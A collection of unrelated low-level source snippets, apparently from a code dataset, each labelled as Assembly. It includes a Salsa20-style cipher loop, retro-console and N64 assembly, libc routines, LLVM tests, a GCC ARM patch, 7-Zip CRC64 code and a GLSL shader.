PSRLL $23,X12
PXOR X12,X15
MOVOA X2,X0
PADDL X13,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X9
PSRLL $23,X12
PXOR X12,X9
MOVOA X6,X0
PADDL X15,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X11
PSRLL $19,X12
PXOR X12,X11
MOVOA X13,X0
PADDL X9,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X3
PSRLL $19,X12
PXOR X12,X3
MOVOA X15,X0
PADDL X11,X0
MOVOA X0,X12
PSLLL $18,X0
PXOR X0,X1
PSRLL $14,X12
PXOR X12,X1
MOVOA X9,X0
PADDL X3,X0
MOVOA X0,X12
PSLLL $18,X0
PXOR X0,X2
PSRLL $14,X12
PXOR X12,X2
MOVOA 320(SP),X12
MOVOA 336(SP),X0
SUBQ $2,DX
JA MAINLOOP1
PADDL 112(SP),X12
PADDL 176(SP),X7
PADDL 224(SP),X10
PADDL 272(SP),X4
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
PSHUFL $0X39,X12,X12
PSHUFL $0X39,X7,X7
PSHUFL $0X39,X10,X10
PSHUFL $0X39,X4,X4
XORL 0(SI),DX
XORL 4(SI),CX
XORL 8(SI),R8
XORL 12(SI),R9
MOVL DX,0(DI)
MOVL CX,4(DI)
MOVL R8,8(DI)
MOVL R9,12(DI)
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
PSHUFL $0X39,X12,X12
PSHUFL $0X39,X7,X7
PSHUFL $0X39,X10,X10
PSHUFL $0X39,X4,X4
XORL 64(SI),DX
XORL 68(SI),CX
XORL 72(SI),R8
XORL 76(SI),R9
MOVL DX,64(DI)
MOVL CX,68(DI)
MOVL R8,72(DI)
MOVL R9,76(DI)
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
PSHUFL $0X39,X12,X12
PSHUFL $0X39,X7,X7
PSHUFL $0X39,X10,X10
PSHUFL $0X39,X4,X4
XORL 128(SI),DX
XORL 132(SI),CX
XORL 136(SI),R8
XORL 140(SI),R9
MOVL DX,128(DI)
MOVL CX,132(DI)
MOVL R8,136(DI)
MOVL R9,140(DI)
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
XORL 192(SI),DX
XORL 196(SI),CX
XORL 200(SI),R8
XORL 204(SI),R9
MOVL DX,192(DI)
MOVL CX,196(DI)
MOVL R8,200(DI)
MOVL R9,204(DI)
PADDL 240(SP),X14
PADDL 64(SP),X0
PADDL 128(SP),X5
PADDL 192(SP),X8
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
PSHUFL $0X39,X14,X14
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X5,X5
PSHUFL $0X39,X8,X8
XORL 16(SI),DX
XORL 20(SI),CX
XORL 24(SI),R8
XORL 28(SI),R9
MOVL DX,16(DI)
MOVL CX,20(DI)
MOVL R8,24(DI)
MOVL R9,28(DI)
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
PSHUFL $0X39,X14,X14
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X5,X5
PSHUFL $0X39,X8,X8
XORL 80(SI),DX
XORL 84(SI),CX
XORL 88(SI),R8
XORL 92(SI),R9
MOVL DX,80(DI)
MOVL CX,84(DI)
MOVL R8,88(DI)
MOVL R9,92(DI)
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
PSHUFL $0X39,X14,X14
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X5,X5
PSHUFL $0X39,X8,X8
XORL 144(SI),DX
XORL 148(SI),CX
XORL 152(SI),R8
XORL 156(SI),R9
MOVL DX,144(DI)
MOVL CX,148(DI)
MOVL R8,152(DI)
MOVL R9,156(DI)
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
XORL 208(SI),DX
XORL 212(SI),CX
XORL 216(SI),R8
XORL 220(SI),R9
MOVL DX,208(DI)
MOVL CX,212(DI)
MOVL R8,216(DI)
MOVL R9,220(DI)
PADDL 288(SP),X15
PADDL 304(SP),X11
PADDL 80(SP),X1
PADDL 144(SP),X6
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
PSHUFL $0X39,X15,X15
PSHUFL $0X39,X11,X11
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X6,X6
XORL 32(SI),DX
XORL 36(SI),CX
XORL 40(SI),R8
XORL 44(SI),R9
MOVL DX,32(DI)
MOVL CX,36(DI)
MOVL R8,40(DI)
MOVL R9,44(DI)
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
PSHUFL $0X39,X15,X15
PSHUFL $0X39,X11,X11
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X6,X6
XORL 96(SI),DX
XORL 100(SI),CX
XORL 104(SI),R8
XORL 108(SI),R9
MOVL DX,96(DI)
MOVL CX,100(DI)
MOVL R8,104(DI)
MOVL R9,108(DI)
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
PSHUFL $0X39,X15,X15
PSHUFL $0X39,X11,X11
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X6,X6
XORL 160(SI),DX
XORL 164(SI),CX
XORL 168(SI),R8
XORL 172(SI),R9
MOVL DX,160(DI)
MOVL CX,164(DI)
MOVL R8,168(DI)
MOVL R9,172(DI)
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
XORL 224(SI),DX
XORL 228(SI),CX
XORL 232(SI),R8
XORL 236(SI),R9
MOVL DX,224(DI)
MOVL CX,228(DI)
MOVL R8,232(DI)
MOVL R9,236(DI)
PADDL 160(SP),X13
PADDL 208(SP),X9
PADDL 256(SP),X3
PADDL 96(SP),X2
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
PSHUFL $0X39,X13,X13
PSHUFL $0X39,X9,X9
PSHUFL $0X39,X3,X3
PSHUFL $0X39,X2,X2
XORL 48(SI),DX
XORL 52(SI),CX
XORL 56(SI),R8
XORL 60(SI),R9
MOVL DX,48(DI)
MOVL CX,52(DI)
MOVL R8,56(DI)
MOVL R9,60(DI)
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
PSHUFL $0X39,X13,X13
PSHUFL $0X39,X9,X9
PSHUFL $0X39,X3,X3
PSHUFL $0X39,X2,X2
XORL 112(SI),DX
XORL 116(SI),CX
XORL 120(SI),R8
XORL 124(SI),R9
MOVL DX,112(DI)
MOVL CX,116(DI)
MOVL R8,120(DI)
MOVL R9,124(DI)
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
PSHUFL $0X39,X13,X13
PSHUFL $0X39,X9,X9
PSHUFL $0X39,X3,X3
PSHUFL $0X39,X2,X2
XORL 176(SI),DX
XORL 180(SI),CX
XORL 184(SI),R8
XORL 188(SI),R9
MOVL DX,176(DI)
MOVL CX,180(DI)
MOVL R8,184(DI)
MOVL R9,188(DI)
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
XORL 240(SI),DX
XORL 244(SI),CX
XORL 248(SI),R8
XORL 252(SI),R9
MOVL DX,240(DI)
MOVL CX,244(DI)
MOVL R8,248(DI)
MOVL R9,252(DI)
MOVQ 352(SP),R9
SUBQ $256,R9
ADDQ $256,SI
ADDQ $256,DI
CMPQ R9,$256
JAE BYTESATLEAST256
CMPQ R9,$0
JBE DONE
BYTESBETWEEN1AND255:
CMPQ R9,$64
JAE NOCOPY
MOVQ DI,DX
LEAQ 360(SP),DI
MOVQ R9,CX
REP; MOVSB
LEAQ 360(SP),DI
LEAQ 360(SP),SI
NOCOPY:
MOVQ R9,352(SP)
MOVOA 48(SP),X0
MOVOA 0(SP),X1
MOVOA 16(SP),X2
MOVOA 32(SP),X3
MOVOA X1,X4
MOVQ $20,CX
MAINLOOP2:
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X3
PXOR X6,X3
PADDL X3,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X3,X3
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X1
PSHUFL $0X4E,X2,X2
PXOR X6,X1
PADDL X1,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $18,X5
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X1,X1
PXOR X6,X0
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X1
PXOR X6,X1
PADDL X1,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X1,X1
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X3
PSHUFL $0X4E,X2,X2
PXOR X6,X3
PADDL X3,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $18,X5
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X3,X3
PXOR X6,X0
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X3
PXOR X6,X3
PADDL X3,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X3,X3
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X1
PSHUFL $0X4E,X2,X2
PXOR X6,X1
PADDL X1,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $18,X5
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X1,X1
PXOR X6,X0
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X1
PXOR X6,X1
PADDL X1,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X1,X1
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X3
PSHUFL $0X4E,X2,X2
PXOR X6,X3
SUBQ $4,CX
PADDL X3,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $18,X5
PXOR X7,X7
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X3,X3
PXOR X6,X0
JA MAINLOOP2
PADDL 48(SP),X0
PADDL 0(SP),X1
PADDL 16(SP),X2
PADDL 32(SP),X3
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X2,X2
PSHUFL $0X39,X3,X3
XORL 0(SI),CX
XORL 48(SI),R8
XORL 32(SI),R9
XORL 16(SI),AX
MOVL CX,0(DI)
MOVL R8,48(DI)
MOVL R9,32(DI)
MOVL AX,16(DI)
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X2,X2
PSHUFL $0X39,X3,X3
XORL 20(SI),CX
XORL 4(SI),R8
XORL 52(SI),R9
XORL 36(SI),AX
MOVL CX,20(DI)
MOVL R8,4(DI)
MOVL R9,52(DI)
MOVL AX,36(DI)
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X2,X2
PSHUFL $0X39,X3,X3
XORL 40(SI),CX
XORL 24(SI),R8
XORL 8(SI),R9
XORL 56(SI),AX
MOVL CX,40(DI)
MOVL R8,24(DI)
MOVL R9,8(DI)
MOVL AX,56(DI)
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
XORL 60(SI),CX
XORL 44(SI),R8
XORL 28(SI),R9
XORL 12(SI),AX
MOVL CX,60(DI)
MOVL R8,44(DI)
MOVL R9,28(DI)
MOVL AX,12(DI)
MOVQ 352(SP),R9
MOVL 16(SP),CX
MOVL 36 (SP),R8
ADDQ $1,CX
SHLQ $32,R8
ADDQ R8,CX
MOVQ CX,R8
SHRQ $32,R8
MOVL CX,16(SP)
MOVL R8, 36 (SP)
CMPQ R9,$64
JA BYTESATLEAST65
JAE BYTESATLEAST64
MOVQ DI,SI
MOVQ DX,DI
MOVQ R9,CX
REP; MOVSB
BYTESATLEAST64:
DONE:
MOVQ R12,SP
RET
BYTESATLEAST65:
SUBQ $64,R9
ADDQ $64,DI
ADDQ $64,SI
JMP BYTESBETWEEN1AND255
| {
"language": "Assembly"
} |
; ############################ define ##############################
YMPORT0 EQU $4000 ; YM2612 port 0
YMPORT1 EQU $4001 ; YM2612 port 1
YMPORT2 EQU $4002 ; YM2612 port 2
YMPORT3 EQU $4003 ; YM2612 port 3
VDPSTATUS_H EQU $7F04 ; VDP status port high
VDPSTATUS_L EQU $7F05 ; VDP status port low
VCOUNTER EQU $7F08 ; V counter
HCOUNTER EQU $7F09 ; H counter
PSGPORT EQU $7F11 ; PSG port
BANKREG EQU $6000 ; bank register
COMPLAY_SFT EQU 0 ; start play command
COMSTOP_SFT EQU 4 ; stop play command
STATPLAY_SFT EQU 0 ; playing status
STATREADY_SFT EQU 7 ; driver ready status
CH0_SFT EQU 0 ; channel 0
CH1_SFT EQU 1 ; channel 1
CH2_SFT EQU 2 ; channel 2
CH3_SFT EQU 3 ; channel 3
COMPLAY EQU 1<<COMPLAY_SFT
COMSTOP EQU 1<<COMSTOP_SFT
STATPLAY EQU 1<<STATPLAY_SFT
STATREADY EQU 1<<STATREADY_SFT
CH0 EQU 1<<CH0_SFT
CH1 EQU 1<<CH1_SFT
CH2 EQU 1<<CH2_SFT
CH3 EQU 1<<CH3_SFT
; ########################### variable #############################
COMMAND EQU $0100 ; command from 68K
STATUS EQU $0102 ; status from Z80
PARAMS EQU $0104 ; parameters (68K and Z80)
| {
"language": "Assembly"
} |
glabel func_80039A3C
/* AB0BDC 80039A3C C7A40024 */ lwc1 $f4, 0x24($sp)
/* AB0BE0 80039A40 C7A60020 */ lwc1 $f6, 0x20($sp)
/* AB0BE4 80039A44 C7AA001C */ lwc1 $f10, 0x1c($sp)
/* AB0BE8 80039A48 C7B20010 */ lwc1 $f18, 0x10($sp)
/* AB0BEC 80039A4C 46062201 */ sub.s $f8, $f4, $f6
/* AB0BF0 80039A50 C4D00000 */ lwc1 $f16, ($a2)
/* AB0BF4 80039A54 460A4002 */ mul.s $f0, $f8, $f10
/* AB0BF8 80039A58 00000000 */ nop
/* AB0BFC 80039A5C 46120102 */ mul.s $f4, $f0, $f18
/* AB0C00 80039A60 46048180 */ add.s $f6, $f16, $f4
/* AB0C04 80039A64 E4C60000 */ swc1 $f6, ($a2)
/* AB0C08 80039A68 C7AA0018 */ lwc1 $f10, 0x18($sp)
/* AB0C0C 80039A6C C4E80000 */ lwc1 $f8, ($a3)
/* AB0C10 80039A70 460A0482 */ mul.s $f18, $f0, $f10
/* AB0C14 80039A74 46124400 */ add.s $f16, $f8, $f18
/* AB0C18 80039A78 E4F00000 */ swc1 $f16, ($a3)
/* AB0C1C 80039A7C 8FAE0028 */ lw $t6, 0x28($sp)
/* AB0C20 80039A80 8DC20000 */ lw $v0, ($t6)
/* AB0C24 80039A84 14400004 */ bnez $v0, .L80039A98
/* AB0C28 80039A88 00000000 */ nop
/* AB0C2C 80039A8C ADC50000 */ sw $a1, ($t6)
/* AB0C30 80039A90 03E00008 */ jr $ra
/* AB0C34 80039A94 24020001 */ li $v0, 1
.L80039A98:
/* AB0C38 80039A98 8C8F0000 */ lw $t7, ($a0)
/* AB0C3C 80039A9C 94590000 */ lhu $t9, ($v0)
/* AB0C40 80039AA0 00001025 */ move $v0, $zero
/* AB0C44 80039AA4 8DF8001C */ lw $t8, 0x1c($t7)
/* AB0C48 80039AA8 001940C0 */ sll $t0, $t9, 3
/* AB0C4C 80039AAC 8FAB0028 */ lw $t3, 0x28($sp)
/* AB0C50 80039AB0 03084821 */ addu $t1, $t8, $t0
/* AB0C54 80039AB4 8D230004 */ lw $v1, 4($t1)
/* AB0C58 80039AB8 00035100 */ sll $t2, $v1, 4
/* AB0C5C 80039ABC 05410003 */ bgez $t2, .L80039ACC
/* AB0C60 80039AC0 00000000 */ nop
/* AB0C64 80039AC4 10000001 */ b .L80039ACC
/* AB0C68 80039AC8 24020001 */ li $v0, 1
.L80039ACC:
/* AB0C6C 80039ACC 54400005 */ bnezl $v0, .L80039AE4
/* AB0C70 80039AD0 00001025 */ move $v0, $zero
/* AB0C74 80039AD4 AD650000 */ sw $a1, ($t3)
/* AB0C78 80039AD8 03E00008 */ jr $ra
/* AB0C7C 80039ADC 24020001 */ li $v0, 1
/* AB0C80 80039AE0 00001025 */ move $v0, $zero
.L80039AE4:
/* AB0C84 80039AE4 03E00008 */ jr $ra
/* AB0C88 80039AE8 00000000 */ nop
| {
"language": "Assembly"
} |
.set noreorder
.global _longjmp
.global longjmp
.type _longjmp,@function
.type longjmp,@function
_longjmp:
longjmp:
move $2, $5
bne $2, $0, 1f
nop
addu $2, $2, 1
1:
#ifndef __mips_soft_float
ldc1 $24, 96($4)
ldc1 $25, 104($4)
ldc1 $26, 112($4)
ldc1 $27, 120($4)
ldc1 $28, 128($4)
ldc1 $29, 136($4)
ldc1 $30, 144($4)
ldc1 $31, 152($4)
#endif
ld $ra, 0($4)
ld $sp, 8($4)
ld $gp, 16($4)
ld $16, 24($4)
ld $17, 32($4)
ld $18, 40($4)
ld $19, 48($4)
ld $20, 56($4)
ld $21, 64($4)
ld $22, 72($4)
ld $23, 80($4)
ld $30, 88($4)
jr $ra
nop
| {
"language": "Assembly"
} |
/* Non-shared version of memcpy_chk for i686.
Copyright (C) 2017-2020 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<https://www.gnu.org/licenses/>. */
#if IS_IN (libc) && !defined SHARED
# include <sysdeps/i386/memcpy_chk.S>
#endif
| {
"language": "Assembly"
} |
;------------------------------------------------------------------------------
;
; Copyright (c) 2006, Intel Corporation. All rights reserved.<BR>
; This program and the accompanying materials
; are licensed and made available under the terms and conditions of the BSD License
; which accompanies this distribution. The full text of the license may be found at
; http://opensource.org/licenses/bsd-license.php.
;
; THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
; WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
;
; Module Name:
;
; InterlockedCompareExchange32.Asm
;
; Abstract:
;
; InterlockedCompareExchange32 function
;
; Notes:
;
;------------------------------------------------------------------------------
.486
.model flat,C
.code
;------------------------------------------------------------------------------
; UINT32
; EFIAPI
; InternalSyncCompareExchange32 (
; IN UINT32 *Value,
; IN UINT32 CompareValue,
; IN UINT32 ExchangeValue
; );
;------------------------------------------------------------------------------
InternalSyncCompareExchange32 PROC
mov ecx, [esp + 4]
mov eax, [esp + 8]
mov edx, [esp + 12]
lock cmpxchg [ecx], edx
ret
InternalSyncCompareExchange32 ENDP
END
| {
"language": "Assembly"
} |
// RUN: not llvm-mc -triple arm64-linux-gnu -mattr=-fp-armv8,-crc < %s 2> %t
// RUN: FileCheck --check-prefix=CHECK-ERROR < %t %s
fcvt d0, s0
// CHECK-ERROR: error: instruction requires: fp-armv8
// CHECK-ERROR-NEXT: fcvt d0, s0
// CHECK-ERROR-NEXT: ^
fmla v9.2s, v9.2s, v0.2s
// CHECK-ERROR: error: instruction requires: neon
// CHECK-ERROR-NEXT: fmla v9.2s, v9.2s, v0.2s
// CHECK-ERROR-NEXT: ^
pmull v0.1q, v1.1d, v2.1d
// CHECK-ERROR: error: instruction requires: crypto
// CHECK-ERROR-NEXT: pmull v0.1q, v1.1d, v2.1d
// CHECK-ERROR-NEXT: ^
crc32b w5, w7, w20
// CHECK-ERROR: error: instruction requires: crc
// CHECK-ERROR-NEXT: crc32b w5, w7, w20
// CHECK-ERROR-NEXT: ^
| {
"language": "Assembly"
} |
; RUN: opt < %s -S -loop-unswitch -verify-loop-info -verify-dom-info | FileCheck %s
; PR12343: -loop-unswitch crash on indirect branch
; CHECK: %0 = icmp eq i64 undef, 0
; CHECK-NEXT: br i1 %0, label %"5", label %"4"
; CHECK: "5": ; preds = %entry
; CHECK-NEXT: br label %"16"
; CHECK: "16": ; preds = %"22", %"5"
; CHECK-NEXT: indirectbr i8* undef, [label %"22", label %"33"]
; CHECK: "22": ; preds = %"16"
; CHECK-NEXT: br i1 %0, label %"16", label %"26"
; CHECK: "26": ; preds = %"22"
; CHECK-NEXT: unreachable
define void @foo() {
entry:
%0 = icmp eq i64 undef, 0
br i1 %0, label %"5", label %"4"
"4": ; preds = %entry
unreachable
"5": ; preds = %entry
br label %"16"
"16": ; preds = %"22", %"5"
indirectbr i8* undef, [label %"22", label %"33"]
"22": ; preds = %"16"
br i1 %0, label %"16", label %"26"
"26": ; preds = %"22"
unreachable
"33": ; preds = %"16"
unreachable
}
| {
"language": "Assembly"
} |
;
; z88dk RS232 Function
;
; OSCA version
;
; unsigned char rs232_put(char)
;
; $Id: rs232_put.asm,v 1.4 2016-07-29 03:28:48 pauloscustodio Exp $
; __FASTCALL__
SECTION code_clib
PUBLIC rs232_put
PUBLIC _rs232_put
INCLUDE "target/osca/def/osca.def"
rs232_put:
_rs232_put:
ld c,2
.s_wait
in a,(sys_joy_com_flags) ; ensure no byte is still being transmitted
bit 7,a
jr nz,s_wait
ld a,l
out (sys_serial_port),a
;ld b,32 ; limit send speed (gap between bytes)
ld b,20 ; limit send speed (gap between bytes)
.ssplim
djnz ssplim
ld hl,0 ;RS_ERR_OK
ret
| {
"language": "Assembly"
} |
--- a/gcc/config/arm/linux-elf.h
+++ b/gcc/config/arm/linux-elf.h
@@ -60,7 +60,7 @@
%{shared:-lc} \
%{!shared:%{profile:-lc_p}%{!profile:-lc}}"
-#define LIBGCC_SPEC "%{msoft-float:-lfloat} %{mfloat-abi=soft*:-lfloat} -lgcc"
+#define LIBGCC_SPEC "-lgcc"
#define GLIBC_DYNAMIC_LINKER "/lib/ld-linux.so.2"
--- a/gcc/config/arm/t-linux
+++ b/gcc/config/arm/t-linux
@@ -23,7 +23,11 @@ TARGET_LIBGCC2_CFLAGS = -fomit-frame-poi
LIB1ASMSRC = arm/lib1funcs.asm
LIB1ASMFUNCS = _udivsi3 _divsi3 _umodsi3 _modsi3 _dvmd_lnx _clzsi2 _clzdi2 \
- _arm_addsubdf3 _arm_addsubsf3
+ _arm_addsubdf3 _arm_addsubsf3 \
+ _arm_negdf2 _arm_muldivdf3 _arm_cmpdf2 _arm_unorddf2 \
+ _arm_fixdfsi _arm_fixunsdfsi _arm_truncdfsf2 \
+ _arm_negsf2 _arm_muldivsf3 _arm_cmpsf2 _arm_unordsf2 \
+ _arm_fixsfsi _arm_fixunssfsi
# MULTILIB_OPTIONS = mhard-float/msoft-float
# MULTILIB_DIRNAMES = hard-float soft-float
| {
"language": "Assembly"
} |
; XzCrc64Opt.asm -- CRC64 calculation : optimized version
; 2011-06-28 : Igor Pavlov : Public domain
include 7zAsm.asm
MY_ASM_START
ifdef x64
rD equ r9
rN equ r10
num_VAR equ r8
table_VAR equ r9
SRCDAT equ rN + rD
CRC_XOR macro dest:req, src:req, t:req
xor dest, QWORD PTR [r5 + src * 8 + 0800h * t]
endm
CRC1b macro
movzx x6, BYTE PTR [rD]
inc rD
movzx x3, x0_L
xor x6, x3
shr r0, 8
CRC_XOR r0, r6, 0
dec rN
endm
MY_PROLOG macro crc_end:req
MY_PUSH_4_REGS
mov r0, r1
mov rN, num_VAR
mov r5, table_VAR
mov rD, r2
test rN, rN
jz crc_end
@@:
test rD, 3
jz @F
CRC1b
jnz @B
@@:
cmp rN, 8
jb crc_end
add rN, rD
mov num_VAR, rN
sub rN, 4
and rN, NOT 3
sub rD, rN
mov x1, [SRCDAT]
xor r0, r1
add rN, 4
endm
MY_EPILOG macro crc_end:req
sub rN, 4
mov x1, [SRCDAT]
xor r0, r1
mov rD, rN
mov rN, num_VAR
sub rN, rD
crc_end:
test rN, rN
jz @F
CRC1b
jmp crc_end
@@:
MY_POP_4_REGS
endm
MY_PROC XzCrc64UpdateT4, 4
MY_PROLOG crc_end_4
align 16
main_loop_4:
mov x1, [SRCDAT]
movzx x2, x0_L
movzx x3, x0_H
shr r0, 16
movzx x6, x0_L
movzx x7, x0_H
shr r0, 16
CRC_XOR r1, r2, 3
CRC_XOR r0, r3, 2
CRC_XOR r1, r6, 1
CRC_XOR r0, r7, 0
xor r0, r1
add rD, 4
jnz main_loop_4
MY_EPILOG crc_end_4
MY_ENDP
else
rD equ r1
rN equ r7
crc_val equ (REG_SIZE * 5)
crc_table equ (8 + crc_val)
table_VAR equ [r4 + crc_table]
num_VAR equ table_VAR
SRCDAT equ rN + rD
CRC macro op0:req, op1:req, dest0:req, dest1:req, src:req, t:req
op0 dest0, DWORD PTR [r5 + src * 8 + 0800h * t]
op1 dest1, DWORD PTR [r5 + src * 8 + 0800h * t + 4]
endm
CRC_XOR macro dest0:req, dest1:req, src:req, t:req
CRC xor, xor, dest0, dest1, src, t
endm
CRC1b macro
movzx x6, BYTE PTR [rD]
inc rD
movzx x3, x0_L
xor x6, x3
shrd r0, r2, 8
shr r2, 8
CRC_XOR r0, r2, r6, 0
dec rN
endm
MY_PROLOG macro crc_end:req
MY_PUSH_4_REGS
mov rN, r2
mov x0, [r4 + crc_val]
mov x2, [r4 + crc_val + 4]
mov r5, table_VAR
test rN, rN
jz crc_end
@@:
test rD, 3
jz @F
CRC1b
jnz @B
@@:
cmp rN, 8
jb crc_end
add rN, rD
mov num_VAR, rN
sub rN, 4
and rN, NOT 3
sub rD, rN
xor r0, [SRCDAT]
add rN, 4
endm
MY_EPILOG macro crc_end:req
sub rN, 4
xor r0, [SRCDAT]
mov rD, rN
mov rN, num_VAR
sub rN, rD
crc_end:
test rN, rN
jz @F
CRC1b
jmp crc_end
@@:
MY_POP_4_REGS
endm
MY_PROC XzCrc64UpdateT4, 5
MY_PROLOG crc_end_4
movzx x6, x0_L
align 16
main_loop_4:
mov r3, [SRCDAT]
xor r3, r2
CRC xor, mov, r3, r2, r6, 3
movzx x6, x0_H
shr r0, 16
CRC_XOR r3, r2, r6, 2
movzx x6, x0_L
movzx x0, x0_H
CRC_XOR r3, r2, r6, 1
CRC_XOR r3, r2, r0, 0
movzx x6, x3_L
mov r0, r3
add rD, 4
jnz main_loop_4
MY_EPILOG crc_end_4
MY_ENDP
endif
end
| {
"language": "Assembly"
} |
# RUN: llvm-mc -triple aarch64-none-linux-gnu -mattr=+v8.2a --disassemble < %s | FileCheck %s
# RUN: llvm-mc -triple aarch64-none-linux-gnu -mattr=-v8.2a --disassemble < %s | FileCheck %s --check-prefix=NO_V82
[0x01,0x79,0x08,0xd5]
[0x22,0x79,0x08,0xd5]
# CHECK: at s1e1rp, x1
# CHECK: at s1e1wp, x2
# NO_V82: sys #0, c7, c9, #0, x1
# NO_V82: sys #0, c7, c9, #1, x2
| {
"language": "Assembly"
} |
uniform sampler2D _BumpMap;
uniform lowp vec4 _LightColor0;
uniform sampler2D _MainTex;
uniform lowp float _Shininess;
varying lowp vec2 xlv_TEXCOORD0;
varying lowp vec3 xlv_TEXCOORD1;
varying lowp vec3 xlv_TEXCOORD2;
varying lowp vec3 xlv_TEXCOORD3;
void main ()
{
lowp vec4 c_1;
lowp vec3 Normal_2;
lowp vec4 tmpvar_3;
tmpvar_3 = texture2D (_MainTex, xlv_TEXCOORD0);
Normal_2 = ((texture2D (_BumpMap, xlv_TEXCOORD0).xyz * 2.0) - 1.0);
c_1.xyz = ((tmpvar_3.xyz * (
(_LightColor0.xyz * max (0.0, dot (Normal_2, xlv_TEXCOORD2)))
+ xlv_TEXCOORD3)) + (_LightColor0.xyz * (
pow (max (0.0, dot (Normal_2, xlv_TEXCOORD1)), _Shininess)
* tmpvar_3.w)));
c_1.w = 0.0;
gl_FragData[0] = c_1;
}
// stats: 14 alu 2 tex 0 flow
// inputs: 4
// #0: xlv_TEXCOORD0 (low float) 2x1 [-1]
// #1: xlv_TEXCOORD1 (low float) 3x1 [-1]
// #2: xlv_TEXCOORD2 (low float) 3x1 [-1]
// #3: xlv_TEXCOORD3 (low float) 3x1 [-1]
// uniforms: 2 (total size: 0)
// #0: _LightColor0 (low float) 4x1 [-1]
// #1: _Shininess (low float) 1x1 [-1]
// textures: 2
// #0: _BumpMap (low 2d) 0x0 [-1]
// #1: _MainTex (low 2d) 0x0 [-1]
| {
"language": "Assembly"
} |
位址 程式 絕對定址 相對於 PC 定址
0000 LD R1, A 00100010 001F000C
0004 ST R5, B 01500014 015F000C
0008 ADD R2, R1, R5 13215000
000C RET 2C000000
0010 A: WORD 3 00000003
0014 B: WORD 5 00000005
0018 XOR R1, R2, R6 1A126000
001C SHL R1, R2, 10 1E12000A
